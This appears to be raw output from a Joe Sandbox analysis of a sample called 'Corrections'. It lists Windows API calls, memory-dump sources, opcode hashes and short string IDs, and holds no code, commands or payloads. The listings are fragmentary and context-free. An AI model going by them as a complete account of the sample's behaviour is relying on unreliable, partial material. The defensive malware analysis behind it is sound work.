                                                                                                                                                                                                                                                                                            • Instruction ID: 6c711edfb40be33e07d95390eaf3698086c5c3cca1cbcfe7dc879a51b5e6fee9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d9f8fe2e0ce7c5caf80a412d6650085a7d6ad252c733ee2c3c67950e7e64e18
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78E06DB1116224BADA2027A29D8DEEB7F6CDB42BB1F400119F106D2180EAA4CA40E2B0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00921F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: BeginPath.GDI32(?), ref: 00921FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 009B92E3
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 009B92F0
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 009B9300
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 009B930E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2e9b280e218a3f922601db6cead2f4fc35ccfbad43db57fac1344f530a7927ad
                                                                                                                                                                                                                                                                                            • Instruction ID: c702ca2ba34ccad14b00b9799f18d6a6821bfd457bdfe4085e5113ec4c49baf9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e9b280e218a3f922601db6cead2f4fc35ccfbad43db57fac1344f530a7927ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F05E3202A269BBDB126F54AE0EFDE3F69AF0A330F048100FA11611E1C7B55561EFA5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000008), ref: 009221BC
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 009221C6
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 009221D9
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000005), ref: 009221E1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 56023be6af0f9edbd66e62bbba8da21cf382e1558487d3ebc9b7c39dee36b779
                                                                                                                                                                                                                                                                                            • Instruction ID: a008c5e6eac393125f5c37cec1c9e53f8e1a1d3c9a7e1870ead831925d9a72b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56023be6af0f9edbd66e62bbba8da21cf382e1558487d3ebc9b7c39dee36b779
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE06D31259240BADB215B78BC09BE83B65AB12336F04C329F7BA580E0D7728640AB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0097EC36
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0097EC40
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0097EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0097EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: be91a38e74a9deab3fde694e1e6c00f15a290263e221119bcb5342f18f1d0180
                                                                                                                                                                                                                                                                                            • Instruction ID: 986b3e49437a3019c70f7daf2e569b6d48aac0a64cd04e8cd5bb5607e0e3940c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be91a38e74a9deab3fde694e1e6c00f15a290263e221119bcb5342f18f1d0180
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6E01A75C19205DFCB41AFA0DA48A5DBBB1EB48320F108559E84AE3250D7385901AF10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0097EC4A
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0097EC54
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0097EC60
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0097EC81
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 91f937a296854c21ee849f73b8a98158260032526ba49895e032fe75e4a8927e
                                                                                                                                                                                                                                                                                            • Instruction ID: ad619cf620bb9795e607fa7d7c2fcf656f37cd40e66d2f4cca6f2ed62e81413f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91f937a296854c21ee849f73b8a98158260032526ba49895e032fe75e4a8927e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE01A74C19205DFCB409FA0DA48A5DBBB1AB48320F108519E849E3250D7385901AF00
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF
                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00995919
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                            • Opcode ID: cc240e94e856a3a8b9ecdfa7fc58231dc1bfc740d48f4ceaa5e584809e6cbcd4
                                                                                                                                                                                                                                                                                            • Instruction ID: be0363cb8d99f88c65fd9f35c41ee5fe38bb54ef6afa0e4f54891cc54ac69886
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc240e94e856a3a8b9ecdfa7fc58231dc1bfc740d48f4ceaa5e584809e6cbcd4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A91BD75A01604DFDB15DF58C4C4EAABBF5AF48304F1A8099E84A9F362C731EE85CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0094E67D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                            • Opcode ID: 33fa7f68a03baa81e0879465782eaf5d3098794389dcd8267b02aae6fdbc7d7f
                                                                                                                                                                                                                                                                                            • Instruction ID: 446b7dd48ca641ef045a949e7991afec2bf52ae2accfe70eb0c44e2799a7076d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33fa7f68a03baa81e0879465782eaf5d3098794389dcd8267b02aae6fdbc7d7f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37519F71E1C50186D711F725DD01BBB2BA8BB50752F308D58F8D5522E8EF398C89AB46
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                            • Opcode ID: 796fdaa4ae8d2f4018ec843f99d58ee3ca4ef431aba78a97dc4d9e8b1991098f
                                                                                                                                                                                                                                                                                            • Instruction ID: d9e4ec1dc1fd63e1eec030171f521b2a49992157d8d2c05a679c3be26e4a80eb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 796fdaa4ae8d2f4018ec843f99d58ee3ca4ef431aba78a97dc4d9e8b1991098f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33516432544246DFCB25DF28C449BBB7BA8EF55320F248055F895AB2E0DB749D82CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 0093F6DB
                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0093F6F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 4ec5ce38f92a7174435400a518257b660647deecd3269921c02b1c707fd26953
                                                                                                                                                                                                                                                                                            • Instruction ID: 0f624749464bb48bf701f42fc4578758291cc49e1bf6e8119611f52004246623
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ec5ce38f92a7174435400a518257b660647deecd3269921c02b1c707fd26953
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 585148B14197589BD320AF10EC86BABBBF8FBD4300F81885DF1D9411A5DF308569CB66
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                            • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                            • Opcode ID: 61348d70a9d31fe409887199a516ddb678ce506392332b457716847c4024b1c4
                                                                                                                                                                                                                                                                                            • Instruction ID: b5d45be14516dd4234de3ce705d7386019714b0f4fe465501159790794acd119
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61348d70a9d31fe409887199a516ddb678ce506392332b457716847c4024b1c4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB419E71A00215DFCB04EFA8C885AEEBBB5FF99364F144029E815E7251E771AD81CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0099DB75
                                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0099DB7F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                            • Opcode ID: fa7de1dc8bc4e6a6cb72b681b518d21d5655850957f23b3ad449676c3900ea8b
                                                                                                                                                                                                                                                                                            • Instruction ID: 42cd0f70742e96e97ec5c6c5ca9038253f68fdf2bbc97cd636b3b59e703e7860
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa7de1dc8bc4e6a6cb72b681b518d21d5655850957f23b3ad449676c3900ea8b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97317071C02119ABCF05EFA4DC85EEEBFB9FF48304F104025F815A6166EB759906CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 009B40BD
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009B40F8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 9efa41b379923017a4f288121595d5670f263370c5a05b2c9a4ce7103d813833
                                                                                                                                                                                                                                                                                            • Instruction ID: ffa542197e5cb082d2853ecf290d6fa16e16e41f2bd17af317ca5e006b62b19f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9efa41b379923017a4f288121595d5670f263370c5a05b2c9a4ce7103d813833
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C531A171110604AADB10DF78CC80FFB77ADFF88724F008619F99597191DA71AC81DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 009B50BD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B50D2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                            • Opcode ID: 058a3230f9a46a3b4ad6f0a7c3e22a2a5ed3e5550f8d27688cccf74e249ffa4c
                                                                                                                                                                                                                                                                                            • Instruction ID: b36e5ac2aecd1d6906af233255fd925d83cf4ab41d5cbc84e8be359697b5745e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 058a3230f9a46a3b4ad6f0a7c3e22a2a5ed3e5550f8d27688cccf74e249ffa4c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F314A74A0170A9FDB14DFA9CA80BEE7BB9FF49310F11406AE908AB351D771A945CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009B3D18
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009B3D23
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: Combobox
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                            • Opcode ID: 5cd6cde1d07cd745912413b30b264cd140c2384f682caeb744706a7c3b1f36ad
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c4ed1aa079e9c7ab9f6130e93879abd632db1192e85d534b1d78a78fdc1c4d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd6cde1d07cd745912413b30b264cd140c2384f682caeb744706a7c3b1f36ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 281190716102086FEF11DFA4DD81FEB3B6EEB883B4F108124F919A7290DA719D5197A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
